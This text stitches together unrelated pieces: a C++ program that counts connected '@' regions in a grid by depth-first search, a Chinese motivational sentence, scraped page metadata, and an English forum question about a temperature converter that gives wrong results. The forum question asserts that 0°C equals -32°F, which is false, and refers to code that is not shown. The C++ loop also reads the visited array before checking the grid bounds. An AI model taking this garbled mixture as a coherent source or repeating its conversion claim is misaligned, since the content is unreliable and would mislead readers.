namespace WindowsFormsApplication9 { public partial class Form1 : Form { private float _num1, _num2, _answer, answer; public Form1() { InitializeComponent(); } private void btn1_Click(object sender, EventArgs e) //convert to F { _num1 = Convert.ToSingle(txtc.Text); _answer = (_num1-32) * (9 / 5); lbx.Items.Add(_answer + " F "); } private void button1_Click(object sender, EventArgs e) //convert to C { _num2 = Convert.ToSingle(txtf.Text); answer = (_num2 - 32) * 5 / 9; ; lbx.Items.Add(answer + " C "); } } | http://www.dreamincode.net/forums/topic/325548-yet-another-temp-converter-c%23-math-problem/ | CC-MAIN-2017-34 | refinedweb | 124 | 55.64 |
#include <audiofile.h>
float afGetFrameSize (AFfilehandle file, int track, int expand3to4);
file is a valid AFfilehandle.
track is an integer which refers to a specific audio track in the file. At present no supported audio file format allows for more than one audio track within a file, so track should always be AF_DEFAULT_TRACK.
expand3to4 is a boolean-valued integer indicating whether frame size calculation will treat 24-bit data as having a size of 3 bytes or 4 bytes.
afGetFrameSize returns the number of bytes in a frame in a given audio track.
A sample frame consists of one or more samples. For a monaural track, a sample frame will always contain one sample. For a stereophonic track, a sample frame will always contain two samples, one for the left channel and one for the right channel.
A non-zero value of expand3to4 should be used when calculating the frame size for storage in memory (since 24-bit audio data is presented in memory as a 4-byte sign-extended integer), while a value of zero should be used for calculating storage on disk where no padding is added. The parameter expand3to4 is ignored unless the specified audio track contains 24-bit audio data.
Michael Pruett <michael@68k.org> | https://man.linuxreviews.org/man3/afGetFrameSize.3.html | CC-MAIN-2020-40 | refinedweb | 209 | 61.56 |
this line:
total = total + x
total is a integer, x is a string. Now look at the error message. You will need to cast x to a integer
x
Also, a function ends the moment a return keyword is reached, which in your case, happens in the first run of the loop, you might want to change the indent of return so the whole loop can run
Thank you for the help, however I think I need to ask better questions. Could you provide insight into where this conversion should take in the code? Im not sure if my conversion code is correct but I think understanding where it should be could help me out!
you want to add x (string) to total (integer), which doesn't work (different data types)
you have two options, casting x to integer (int()) or cast total to string (str())
int()
str()
lets look at the following code (using strings):
a = "1"
b = "2"
c = "3"
d = a + b + c
print d # which will output: 123
and the other code (using integers):
a = 1
b = 2
c = 3
d = a + b + c
print d # will output 6
now, armed with this new knowledge, what would be the next logic step?
def digit_sum(n):# creates fucntion()string = str(digit_sum)#converts n into a string()total = 0 #initiate variable()for x in string:#iterate through the string()()x = int(string)# converts each iteration into an integer()()total = total + x #adding all the contents of the string()return total# returning the sum of the numbers in the string
x = int(string)# converts each iteration into an integer
your comment is false, this will convert your entire string into a integer again, you just want to do this to each individual element (x) in the string
Please read this topic to display indent:
I'm not sure what to replace "string" with. I originally placed the code: x = int(x) with the thought each iteration would now become an integer.
x = int(x)
I then receive the error: Your code looks a bit off--it threw a "invalid literal for int() with base 10: '<'" error.
I'm thinking there must be a very minor error in the existing code as the only step left is to convert x into an integer and I must convert x into an integer before adding it with total. Is the content between the int() brackets the error in the code?
also thank you for the tip, the existing code looks as follows:
def digit_sum(n):# creates fucntion
string = str(digit_sum)#converts n into a string
total = 0 #initiate variable
for x in string:
x = int(x)# converts each iteration into an integer
total = total + x #adding all the contents of the string
return total# returning the sum of the numbers in the string
this code looks fine, do you understand it all now?
This topic was automatically closed 7 days after the last reply. New replies are no longer allowed. | https://discuss.codecademy.com/t/does-your-code-take-one-argument/53936/6 | CC-MAIN-2017-47 | refinedweb | 498 | 53.89 |
This post is about implementing loan pattern in Java.
Use Case
Implement separation between the code that holds resource from that of accessing it such that the accessing code doesn’t need to manage the resources. The use case mentioned holds true when we write code to read/write to a file or querying SQL / NOSQL dbs. There are certainly API’s handled this with the help of AOP. But I thought if a pattern based approach could help us to deal with these kind of use case, that’s where I came to know about Loan Pattern (a.k.a lender lendee pattern).
What it does
Loan pattern takes a “lending approach” i.e the code which keep hold of the resources “lends” if to the calling code. The lender (a.k.a code which holds resources) manages the resources once the lendee (code accessing the resource) has used it (with no interest ). Lets get in to lender code:
/** * This class is an illustration of using loan pattern(a.k.a lender-lendee pattern) * @author prassee */ public class IOResourceLender { /** * Interface to write data to the buffer. Clients using this * class should provide impl of this interface * @author sysadmin * */ public interface WriteBlock { void call(BufferedWriter writer) throws IOException; } /** * Interface to read data from the buffer. Clients using this * class should provide impl of this interface * @author sysadmin * */ public interface ReadBlock { void call(BufferedReader reader) throws IOException; } /** * method which loans / lends the resource. Here {@link FileWriter} is the * resource lent. The resource is managed for the given impl of {@link WriteBlock} * * @param fileName * @param block * @throws IOException */ public static void writeUsing(String fileName, WriteBlock block) throws IOException { File csvFile = new File(fileName); if (!csvFile.exists()) { csvFile.createNewFile(); } FileWriter fw = new FileWriter(csvFile.getAbsoluteFile(), true); BufferedWriter bufferedWriter = new BufferedWriter(fw); block.call(bufferedWriter); bufferedWriter.close(); } /** * method which loans / lends the resource. Here {@link FileReader} is the * resource lent. The resource is managed for * the given impl of {@link ReadBlock} * * @param fileName * @param block * @throws IOException */ public static void readUsing(String fileName, ReadBlock block) throws IOException { File inputFile = new File(fileName); FileReader fileReader = new FileReader(inputFile.getAbsoluteFile()); BufferedReader bufferedReader = new BufferedReader(fileReader); block.call(bufferedReader); bufferedReader.close(); } }
The lender code holds a FileWriter, the resource and we also expect an implementation of WriteBlock so that writeUsing method just calls the method on the WriteBlock interface which is enclosed within the managing the resource. One the client(lendee) side we provide an anonymous implementation of WriteBlock. Here is the lendee code, Iam just giving an method its up to the you to use it in the class which you may like.
public void writeColumnNameToMetaFile(final String attrName, String fileName, final String[] colNames) throws IOException { IOResourceLender.writeUsing(fileName, new IOResourceLender.WriteBlock() { public void call(BufferedWriter out) throws IOException { StringBuilder buffer = new StringBuilder(); for (String string : colNames) { buffer.append(string); buffer.append(','); } out.append(attrName + ' = ' + buffer.toString()); out.newLine(); } }); }
The example uses the loan pattern for a simple file IO operation. However this code could be further improved by providing abstract lenders and lendee.The code for this post is shared in the following gist I welcome your comments and suggestions !!
Reference: Loan pattern in Java (a.k.a lender lendee pattern) from our JCG partner Prasanna Kumar at the Prassee on Scala blog.
Note that you must close the streams in a finally-block, otherwise a file descriptor remains open if the Block.call() fails. In a long running server app, this may exhaust the OS resources and trigger a grinding halt.
I usually use this pattern,but I never call “Loan pattern” and I don’t even call it what! | http://www.javacodegeeks.com/2013/01/loan-pattern-in-java-a-k-a-lender-lendee-pattern.html/comment-page-1/ | CC-MAIN-2015-18 | refinedweb | 606 | 55.84 |
#include <RCBase.h>
Inheritance diagram for RCBase< Type >:
These array objects implement copy-on-write semantics.
This abstract class defines two pure virtual functions, read and write and the local ValRef class. The ValRef class is returned for referenced array elements. This class is a proxy which avoids copy-on-read.
An object that implements copy-on-write arrays defines the [] operator (the index operator). The index operator can be used on either the right or left hand size of an assignment. For example, in the statements below a is an instance of an object that implements the index operator.
MyObj b = a; // b is a reference to a MyType v = a[i]; // A right-hand-side reference a[j] = v; // A left-hand-size reference
References counted objects share a reference to common data until an object is modified. The copy-on-write semantics means that a unique copy will be made before shared object is modified. Ideally this saves memory and improves performance.
In the example above a and b share a reference to the same data set. When a is read, there should be no effect (other than the read). However, when a is modified (by being written), a unique copy is made first. Although previously a and b referenced the same data, the write operation will force the creation of a unique copy for a and only a will be modified. The b object will retain its previous value.
In a better world there would be some way that the programmer could indicate to the C++ compiler that a particular operator [] function implements the right-hand-side or the left-hand-size semantics.
The naive implementation (which I used in the first two versions of a String class) turns out to be wrong. Here is the slightly simplified code from this somewhat incorrect String class. My intention was that the operator [] function below labeled "LHS" would implement copy-on-write. The operator [] labeled RHS would do a read and nothing more.
This code does not properly implement copy-on-write
// // operator [] (RHS) with an integer index // inline char String::operator [](const int ix) const { return pShare->str[ix]; }
// // operator[] (LHS), integer index // inline char & String::operator [](const int ix) { makeUnique(); // make a unique copy of the shared data return pShare->str[ix]; } // operator []
As it turned out, the function labeled LHS is called in most cases, whether the operator [] is on the left or right hand side of the expression. This results in copy-on-read which is, obviously, not desirable and destroys much of the utility for a reference counted object.
The proper implementation of the String object uses an instance of the ValRef object (instantiated for
char).
inline String::ValRef String::operator[](const int ix) { return ValRef( *this, ix ); }
The ValRef object is losely modeled after the Cref class in The C++ Programming Language, Third Edition by Bjarne Stroustrup, Section 11.12.
Definition at line 112 of file RCBase.h. | http://www.bearcave.com/software/string/doc/html/classRCBase.html | CC-MAIN-2017-47 | refinedweb | 496 | 52.8 |
In a recent post on React hooks, I advocated their usage and explained how they could make your functional components flexible, extendable, and reusable. I would like to bring your attention to one of my favorite hooks: useState().
In some cases, you need to bring some state logic into a function component. Instead of rewriting it as a class component, you can hook into React state and lifecycle features. Implementing it is easy!
import React from 'react'; import {useState} from 'react' function App() { const [importantThing, setImportantThing] = useState('initial value') return ( <div > {importantThing} </div> ); } export default App;
After importing useState from React, we see two values in an array being declared, and an initial value being set. The array is there to destructure the variables in useState, where the first value references the variable that lives in the state, and the second value is the reference to the function that changes the variable.
You can also set the variable to be an object, like so:
const [fruits, setFruits] = useState([{ apple: 'Granny Smith' }]);
Discussion (2)
Important note that using an object as state in hooks doesn't behave the same as Class
setState,
in Class's
setStateyou can pass only rhe updated object attributes and it will be merged with the current state, meanwhile in Hooks it will replace the whole object so you need to handle the merging yourself, like:
setFruits({...fruits, banana: 'minions'})
In this case, as same as arrays, it would be better to use the function callback and use the state that the callback gets as a param. | https://dev.to/danimal92/react-hooks-usestate-3316 | CC-MAIN-2022-05 | refinedweb | 260 | 51.11 |
Echoing an XML File with the SAX Parser
In real life, you will have little need to echo an XML file with a SAX parser; usually you will want to process the data in some way as it is parsed. But echoing an XML structure is a good way to see the SAX parser in action and to understand the events it generates.
In this exercise, you'll echo SAX parser events to System.out. Consider it the "Hello World" version of an XML-processing program. It shows you how to use the SAX parser to get at the data and then echoes it to show you what you have.
Note: The code discussed in this section is in Echo01.java. The file it operates on is slideSample01.xml, as described in Writing a Simple XML File. (The browsable version is slideSample01-xml.html.)
Creating the Skeleton
Start by creating a file named Echo.java and enter the skeleton for the application:

public class Echo {

    public static void main(String argv[]) {
    }
}

Because you'll run it standalone, you need a main method. And you need command-line arguments so that you can tell the application which file to echo.
Importing Classes
Next, add the import statements for the classes the application will use:

import java.io.*;
import org.xml.sax.*;
import org.xml.sax.helpers.DefaultHandler;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;

public class Echo {
    ...
The classes in java.io, of course, are needed to do output. The org.xml.sax package defines all the interfaces we use for the SAX parser. The SAXParserFactory class creates the instance we use. It throws a ParserConfigurationException if it cannot produce a parser that matches the specified configuration of options. (Later, you'll see more about the configuration options.) The SAXParser is what the factory returns for parsing, and the DefaultHandler defines the class that will handle the SAX events that the parser generates.
Setting Up for I/O
The first order of business is to process the command-line argument, get the name of the file to echo, and set up the output stream. Add the following highlighted text to take care of those tasks and do a bit of additional housekeeping:

public static void main(String argv[]) {
    if (argv.length != 1) {
        System.err.println("Usage: cmd filename");
        System.exit(1);
    }
    try {
        // Set up output stream
        out = new OutputStreamWriter(System.out, "UTF8");
    } catch (Throwable t) {
        t.printStackTrace();
    }
    System.exit(0);
}

static private Writer out;
When we create the output stream writer, we are selecting the UTF-8 character encoding. We could also have chosen US-ASCII or UTF-16, which the Java platform also supports. For more information on these character sets, see Java Encoding Schemes.
The most important interface for our current purposes is
ContentHandler. This interface requires a number of methods that the SAX parser invokes in response to various parsing events. The major event-handling methods are:
startDocument,
endDocument,
startElement,
endElement, and
characters.
The easiest way to implement this interface is to extend the DefaultHandler class, defined in the org.xml.sax.helpers package. That class provides do-nothing methods for all the ContentHandler events. Enter the following highlighted code to extend that class:

public class Echo extends DefaultHandler {
    ...
Note: DefaultHandler also defines do-nothing methods for the other major events, defined in the DTDHandler, EntityResolver, and ErrorHandler interfaces. You'll learn more about those methods as we go along.
Each of these methods is required by the interface to throw a SAXException. An exception thrown here is sent back to the parser, which sends it on to the code that invoked the parser. In the current program, this sequence means that it winds up back at the Throwable exception handler at the bottom of the main method.
When a start tag or end tag is encountered, the name of the tag is passed as a String to the startElement or the endElement method, as appropriate. When a start tag is encountered, any attributes it defines are also passed in an Attributes list. Characters found within the element are passed as an array of characters, along with the number of characters (length) and an offset into the array that points to the first character.
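Before wiring up the real program, it can help to see this callback sequence for a concrete document. The sketch below is a self-contained illustration, separate from the tutorial's Echo class (the class name and the tiny XML string are invented here); it records which handler methods a default JAXP parser invokes, in order:

```java
import java.io.ByteArrayInputStream;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.helpers.DefaultHandler;

public class EventTrace extends DefaultHandler {
    final List<String> events = new ArrayList<String>();

    public void startDocument() { events.add("startDocument"); }
    public void endDocument()   { events.add("endDocument"); }

    public void startElement(String uri, String localName,
                             String qName, Attributes attrs) {
        // Without namespace processing, the qualified name carries the tag name
        events.add("startElement:" + qName);
    }

    public void endElement(String uri, String localName, String qName) {
        events.add("endElement:" + qName);
    }

    public void characters(char[] buf, int offset, int len) {
        events.add("characters:" + new String(buf, offset, len));
    }

    // Parse the XML string and return the recorded event sequence;
    // checked exceptions are wrapped for brevity.
    static List<String> trace(String xml) {
        try {
            EventTrace handler = new EventTrace();
            SAXParserFactory.newInstance().newSAXParser().parse(
                new ByteArrayInputStream(xml.getBytes("UTF-8")), handler);
            return handler.events;
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        for (String e : trace("<greeting>hi</greeting>")) {
            System.out.println(e);
        }
    }
}
```

For `<greeting>hi</greeting>` the trace starts with startDocument and startElement, and ends with endElement and endDocument, with one or more characters events in between.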
Setting up the Parser
Now (at last) you're ready to set up the parser. Add the following highlighted code to set it up and get it started:

public static void main(String argv[]) {
    if (argv.length != 1) {
        System.err.println("Usage: cmd filename");
        System.exit(1);
    }

    // Use an instance of ourselves as the SAX event handler
    DefaultHandler handler = new Echo();

    // Use the default (non-validating) parser
    SAXParserFactory factory = SAXParserFactory.newInstance();

    try {
        // Set up output stream
        out = new OutputStreamWriter(System.out, "UTF8");

        // Parse the input
        SAXParser saxParser = factory.newSAXParser();
        saxParser.parse(new File(argv[0]), handler);
    } catch (Throwable t) {
        t.printStackTrace();
    }
    System.exit(0);
}
With these lines of code, you create a SAXParserFactory instance, as determined by the setting of the javax.xml.parsers.SAXParserFactory system property. You then get a parser from the factory and give the parser an instance of this class to handle the parsing events, telling it which input file to process.
Note: The javax.xml.parsers.SAXParser class is a wrapper that defines a number of convenience methods. It wraps the (somewhat less friendly) org.xml.sax.Parser object. If needed, you can obtain that parser using the SAXParser's getParser() method.
For now, you are simply catching any exception that the parser might throw. You'll learn more about error processing in a later section of this chapter, Handling Errors with the Nonvalidating Parser.
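The factory's configuration options mentioned above can be checked and toggled before a parser is requested. A small illustrative sketch (the class and helper names are invented here) shows the JAXP defaults, which are nonvalidating and not namespace-aware:

```java
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;

public class FactoryDemo {
    // Build a namespace-aware parser; checked exceptions wrapped for brevity
    static SAXParser namespaceAwareParser() {
        try {
            SAXParserFactory factory = SAXParserFactory.newInstance();
            factory.setNamespaceAware(true);
            return factory.newSAXParser();
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        // JAXP defaults: nonvalidating and not namespace-aware
        System.out.println(factory.isValidating());      // false
        System.out.println(factory.isNamespaceAware());  // false
        // Options set on the factory carry over to the parsers it creates
        System.out.println(namespaceAwareParser().isNamespaceAware()); // true
    }
}
```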
Writing the Output
The ContentHandler methods throw SAXExceptions but not IOExceptions, which can occur while writing. The SAXException can wrap another exception, though, so it makes sense to do the output in a method that takes care of the exception-handling details. Add the following highlighted code to define an emit method that does that:

static private Writer out;

private void emit(String s) throws SAXException {
    try {
        out.write(s);
        out.flush();
    } catch (IOException e) {
        throw new SAXException("I/O error", e);
    }
}
...
When emit is called, any I/O error is wrapped in a SAXException along with a message that identifies it. That exception is then thrown back to the SAX parser. You'll learn more about SAX exceptions later. For now, keep in mind that emit is a small method that handles the string output. (You'll see it called often in later code.)
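The wrapped exception is not lost: SAXException keeps the embedded exception, and the code that eventually catches it can recover the original cause. A minimal standalone sketch (class name invented here) demonstrates this:

```java
import java.io.IOException;
import org.xml.sax.SAXException;

public class WrapDemo {
    public static void main(String[] args) {
        IOException cause = new IOException("disk full");
        SAXException wrapped = new SAXException("I/O error", cause);

        // The message identifies the failure...
        System.out.println(wrapped.getMessage());            // I/O error
        // ...and the original exception is still reachable
        System.out.println(wrapped.getException() == cause); // true
    }
}
```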
Spacing the Output
Here is another bit of infrastructure we need before doing some real processing. Add the following highlighted code to define an nl() method that writes the kind of line-ending character used by the current system:

private void emit(String s)
    ...
}

private void nl() throws SAXException {
    String lineEnd = System.getProperty("line.separator");
    try {
        out.write(lineEnd);
    } catch (IOException e) {
        throw new SAXException("I/O error", e);
    }
}
Note: Although it seems like a bit of a nuisance, you will be invoking nl() many times in later code. Defining it now will simplify the code later on. It also provides a place to indent the output when we get to that section of the tutorial.
Handling Content Events
Finally, let's write some code that actually processes the ContentHandler events.
Document Events
Add the following highlighted code to handle the start-document and end-document events:

static private Writer out;

public void startDocument() throws SAXException {
    emit("<?xml version='1.0' encoding='UTF-8'?>");
    nl();
}

public void endDocument() throws SAXException {
    try {
        nl();
        out.flush();
    } catch (IOException e) {
        throw new SAXException("I/O error", e);
    }
}

private void echoText()
...
Here, you are echoing an XML declaration when the parser encounters the start of the document. Because you set up the OutputStreamWriter using UTF-8 encoding, you include that specification as part of the declaration.
Note: However, the IO classes don't understand the hyphenated encoding names, so you specified UTF8 for the OutputStreamWriter rather than UTF-8.
At the end of the document, you simply put out a final newline and flush the output stream. Not much going on there.
Element Events
Now for the interesting stuff. Add the following highlighted code to process the start-element and end-element events:
public void startElement(String namespaceURI,
                         String sName, // simple name
                         String qName, // qualified name
                         Attributes attrs)
throws SAXException {
    String eName = sName; // element name
    if ("".equals(eName)) eName = qName; // not namespace-aware
    emit("<" + eName);
    if (attrs != null) {
        for (int i = 0; i < attrs.getLength(); i++) {
            String aName = attrs.getLocalName(i); // Attr name
            if ("".equals(aName)) aName = attrs.getQName(i);
            emit(" " + aName + "=\"" + attrs.getValue(i) + "\"");
        }
    }
    emit(">");
}

public void endElement(String namespaceURI,
                       String sName, // simple name
                       String qName  // qualified name
                      )
throws SAXException {
    String eName = sName; // element name
    if ("".equals(eName)) eName = qName; // not namespace-aware
    emit("</" + eName + ">");
}

private void emit(String s)
...
With this code, you echo the element tags, including any attributes defined in the start tag. Note that when the startElement() method is invoked, if namespace processing is not enabled, then the simple name (local name) for elements and attributes could turn out to be the empty string. The code handles that case by using the qualified name whenever the simple name is the empty string.
Character Events
To finish handling the content events, you need to handle the characters that the parser delivers to your application.
Parsers are not required to return any particular number of characters at one time. A parser can return anything from a single character at a time up to several thousand and still be a standard-conforming implementation. So if your application needs to process the characters it sees, it is wise to accumulate the characters in a buffer and operate on them only when you are sure that all of them have been found.
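A minimal sketch of that buffering strategy (the class name is invented; this is not the tutorial's code): every characters() chunk is appended to a single buffer, so the text survives however the parser chooses to split it.

```java
import java.io.ByteArrayInputStream;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.helpers.DefaultHandler;

// Accumulates every characters() delivery into one buffer.
public class CharBufferDemo extends DefaultHandler {
    final StringBuilder textBuffer = new StringBuilder();

    @Override
    public void characters(char[] buf, int offset, int len) {
        // May be called once or many times for a single run of text.
        textBuffer.append(buf, offset, len);
    }

    public static String textOf(String xml) throws Exception {
        CharBufferDemo h = new CharBufferDemo();
        SAXParserFactory.newInstance().newSAXParser()
            .parse(new ByteArrayInputStream(xml.getBytes("UTF-8")), h);
        return h.textBuffer.toString();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(textOf("<p>Why <em>WonderWidgets</em> are great</p>"));
    }
}
```

Because the handler never assumes one callback equals one text run, it behaves identically across conforming parsers.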
Add the following highlighted line to define the text buffer:

    public class Echo01 extends DefaultHandler
    {
        StringBuffer textBuffer;

        public static void main(String argv[]) ...
Then add the following highlighted code to accumulate the characters the parser delivers in the buffer:

    public void endElement(...)
    throws SAXException
    {
        ...
    }

    public void characters(char buf[], int offset, int len)
    throws SAXException
    {
        String s = new String(buf, offset, len);
        if (textBuffer == null) {
            textBuffer = new StringBuffer(s);
        } else {
            textBuffer.append(s);
        }
    }

    private void emit(String s) ...
Next, add the following highlighted method to send the contents of the buffer to the output stream:

    public void characters(char buf[], int offset, int len)
    throws SAXException
    {
        ...
    }

    private void echoText()
    throws SAXException
    {
        if (textBuffer == null) return;
        String s = ""+textBuffer;
        emit(s);
        textBuffer = null;
    }

    private void emit(String s) ...
When this method is called twice in a row (which will happen at times, as you'll see next), the buffer will be null. In that case, the method simply returns. When the buffer is not null, however, its contents are sent to the output stream.
Finally, add the following highlighted code to echo the contents of the buffer whenever an element starts or ends:

    public void startElement(...)
    throws SAXException
    {
        echoText();
        String eName = sName; // element name
        ...
    }

    public void endElement(...)
    throws SAXException
    {
        echoText();
        String eName = sName; // element name
        ...
    }
You're finished accumulating text when an element ends, of course. So you echo it at that point, and that action clears the buffer before the next element starts.
But you also want to echo the accumulated text when an element starts! That's necessary for document-style data, which can contain XML elements that are intermixed with text. For example, consider this document fragment:

    <para>This paragraph contains <bold>important</bold> ideas.</para>

The initial text, This paragraph contains, is terminated by the start of the <bold> element. The text important is terminated by the end tag, </bold>, and the final text, ideas., is terminated by the end tag, </para>.
Note: Most of the time, though, the accumulated text will be echoed when an endElement() event occurs. When a startElement() event occurs after that, the buffer will be empty. The first line in the echoText() method checks for that case, and simply returns.
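The event order described here can be checked with a small hypothetical handler (all names invented) that flushes its text buffer on both start and end tags, just as the Echo program does:

```java
import java.io.ByteArrayInputStream;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.helpers.DefaultHandler;

// Shows why text must be flushed on BOTH startElement and endElement:
// in mixed content, character runs are bounded by start tags as well as end tags.
public class MixedContentDemo extends DefaultHandler {
    final List<String> events = new ArrayList<>();
    private final StringBuilder text = new StringBuilder();

    private void flushText() {
        if (text.length() > 0) {
            events.add("CHARS:" + text);
            text.setLength(0);
        }
    }

    @Override
    public void startElement(String u, String s, String q, Attributes a) {
        flushText();
        events.add("START:" + q);
    }

    @Override
    public void endElement(String u, String s, String q) {
        flushText();
        events.add("END:" + q);
    }

    @Override
    public void characters(char[] buf, int off, int len) {
        text.append(buf, off, len);
    }

    public static List<String> eventsOf(String xml) throws Exception {
        MixedContentDemo h = new MixedContentDemo();
        SAXParserFactory.newInstance().newSAXParser()
            .parse(new ByteArrayInputStream(xml.getBytes("UTF-8")), h);
        return h.events;
    }

    public static void main(String[] args) throws Exception {
        eventsOf("<para>This paragraph contains <bold>important</bold> ideas.</para>")
            .forEach(System.out::println);
    }
}
```

Running it shows the leading text flushed by the start of bold, and the trailing text flushed by the end of para.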
Congratulations! At this point you have written a complete SAX parser application. The next step is to compile and run it.
Note: To be strictly accurate, the character handler should scan the buffer for ampersand characters (&) and left-angle bracket characters (<) and replace them with the strings &amp; or &lt;, as appropriate. You'll find out more about that kind of processing when we discuss entity references in Displaying Special Characters and CDATA.
Compiling and Running the Program
In the Application Server, the JAXP libraries are in the directory <J2EE_HOME>/lib/endorsed. These are newer versions of the standard JAXP libraries than those that are part of the Java 2 Platform, Standard Edition versions 1.4.x.
The Application Server automatically uses the newer libraries when a program runs, so you don't have to be concerned with where they reside when you deploy an application. And because the JAXP APIs are identical in both versions, you don't need to be concerned at compile time either. So compiling the program you created is as simple as issuing this command:

    javac Echo.java
But to run the program outside the server container, you must be sure that the java runtime finds the newer versions of the JAXP libraries. That situation can occur, for example, when you're unit-testing parts of your application outside of the server, as well as here, when you're running the XML tutorial examples.
There are two ways to make sure that the program uses the latest version of the JAXP libraries:

- Copy the <J2EE_HOME>/lib/endorsed directory to <J2EE_HOME>/jdk/jre/lib/endorsed (if you are using the Java 2 SDK that comes with the Application Server) or <JAVA_HOME>/jre/lib/endorsed (if you are using a version of the Java 2 SDK that you have installed separately). You can then run the program with this command:

      <J2SE SDK installation>/bin/java Echo slideSample.xml

  The libraries will then be found in the endorsed standards directory.

- Use the endorsed directories system property to specify the location of the libraries, by specifying this option on the java command line:

      -D"java.endorsed.dirs=<J2EE_HOME>/lib/endorsed"

  or

      -D"java.endorsed.dirs=<JAVA_HOME>/jre/lib/endorsed"
Note: Because the JAXP APIs are already built into the Java 2 platform, Standard Edition, they don't need to be specified at compile time. However, when the JAXP factories instantiate an implementation, the endorsed directories mechanism is employed to make sure that the desired implementation is instantiated.
Checking the Output
Here is part of the program's output, showing some of its weird spacing:
    ...
    <slideshow title="Sample Slide Show" date="Date of publication" author="Yours Truly">

    <slide type="all">
    <title>Wake up to WonderWidgets!</title>
    </slide>
    ...
Note: The program's output is contained in Echo01-01.txt. (The browsable version is Echo01-01.html.)
When we look at this output, a number of questions arise. Where is the excess vertical whitespace coming from? And why are the elements indented properly, when the code isn't doing it? We'll answer those questions in a moment. First, though, there are a few points to note about the output:
- The comment defined at the top of the file, <!-- A SAMPLE set of slides -->, does not appear in the listing. Comments are ignored unless you implement a LexicalHandler. You'll see more on that subject later in this tutorial.
- Element attributes are listed all together on a single line. If your window isn't really wide, you won't see them all.
- The single-tag empty element you defined (<item/>) is treated exactly the same as a two-tag empty element (<item></item>). It is, for all intents and purposes, identical. (It's just easier to type and consumes less space.)
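That last point can be verified directly. This sketch (invented names, not tutorial code) records start/end events and compares the two spellings of an empty element:

```java
import java.io.ByteArrayInputStream;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.helpers.DefaultHandler;

// Records the start/end element events so two parses can be compared.
public class EmptyElementDemo extends DefaultHandler {
    final List<String> events = new ArrayList<>();

    @Override
    public void startElement(String u, String s, String q, Attributes a) {
        events.add("start " + q);
    }

    @Override
    public void endElement(String u, String s, String q) {
        events.add("end " + q);
    }

    public static List<String> eventsOf(String xml) throws Exception {
        EmptyElementDemo h = new EmptyElementDemo();
        SAXParserFactory.newInstance().newSAXParser()
            .parse(new ByteArrayInputStream(xml.getBytes("UTF-8")), h);
        return h.events;
    }

    public static void main(String[] args) throws Exception {
        // A SAX application sees the same events either way.
        System.out.println(eventsOf("<item/>").equals(eventsOf("<item></item>")));
    }
}
```

Both forms produce the same start-then-end pair, so a SAX application cannot tell them apart.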
Identifying the Events
This version of the echo program might be useful for displaying an XML file, but it doesn't tell you much about what's going on in the parser. The next step is to modify the program so that you see where the spaces and vertical lines are coming from.
Note: The code discussed in this section is in Echo02.java. The output it produces is shown in Echo02-01.txt. (The browsable version is Echo02-01.html.)
Make the following highlighted changes to identify the events as they occur:

    public void startDocument()
    throws SAXException
    {
        nl(); nl(); emit("START DOCUMENT"); nl();
        emit("<?xml version='1.0' encoding='UTF-8'?>");
        nl();
    }

    public void endDocument()
    throws SAXException
    {
        nl(); emit("END DOCUMENT");
        try {
            ...
    }

    public void startElement(...)
    throws SAXException
    {
        echoText();
        nl(); emit("ELEMENT: ");
        String eName = sName; // element name
        if ("".equals(eName)) eName = qName; // not namespace-aware
        emit("<"+eName);
        if (attrs != null) {
            for (int i = 0; i < attrs.getLength(); i++) {
                String aName = attrs.getLocalName(i); // Attr name
                if ("".equals(aName)) aName = attrs.getQName(i);
                nl(); emit("  ATTR: ");
                emit(aName);
                emit("\t\"");
                emit(attrs.getValue(i));
                emit("\"");
            }
        }
        if (attrs.getLength() > 0) nl();
        emit(">");
    }

    public void endElement(...)
    throws SAXException
    {
        echoText();
        nl(); emit("END_ELM: ");
        String eName = sName; // element name
        if ("".equals(eName)) eName = qName; // not namespace-aware
        emit("</"+eName+">");
    }

    ...

    private void echoText()
    throws SAXException
    {
        if (textBuffer == null) return;
        nl(); emit("CHARS: |");
        String s = ""+textBuffer;
        emit(s);
        emit("|");
        textBuffer = null;
    }
Compile and run this version of the program to produce a more informative output listing. The attributes are now shown one per line, which is nice. But, more importantly, output lines such as the following show that both the indentation space and the newlines that separate the attributes come from the data that the parser passes to the characters() method.
Note: The XML specification requires all input line separators to be normalized to a single newline. The newline character is specified as \n in Java, C, and UNIX systems, but goes by the alias "linefeed" in Windows systems.
Compressing the Output
To make the output more readable, modify the program so that it outputs only characters whose values are something other than whitespace.
Note: The code discussed in this section is in Echo03.java.
Make the following changes to suppress output of characters that are all whitespace: replace emit("CHARS: |") with emit("CHARS: "), guard the emit(s) call, and remove the closing emit("|"):

    private void echoText()
    throws SAXException
    {
        if (textBuffer == null) return;
        nl();
        emit("CHARS: ");
        String s = ""+textBuffer;
        if (!s.trim().equals("")) emit(s);
        textBuffer = null;
    }
Next, add the following highlighted code to echo each set of characters delivered by the parser:

    public void characters(char buf[], int offset, int len)
    throws SAXException
    {
        if (textBuffer != null) {
            echoText();
            textBuffer = null;
        }
        String s = new String(buf, offset, len);
        ...
    }
If you run the program now, you will see that you have also eliminated the indentation, because the indent space is part of the whitespace that precedes the start of an element. Add the following highlighted code to manage the indentation:

    static private Writer out;
    private String indentString = "    "; // Amount to indent
    private int indentLevel = 0;

    ...

    public void startElement(...)
    throws SAXException
    {
        indentLevel++;
        nl(); emit("ELEMENT: ");
        ...
    }

    public void endElement(...)
    throws SAXException
    {
        nl(); emit("END_ELM: ");
        emit("</"+sName+">");
        indentLevel--;
    }

    ...

    private void nl()
    throws SAXException
    {
        ...
        try {
            out.write(lineEnd);
            for (int i = 0; i < indentLevel; i++) out.write(indentString);
        } catch (IOException e) {
            ...
        }
    }
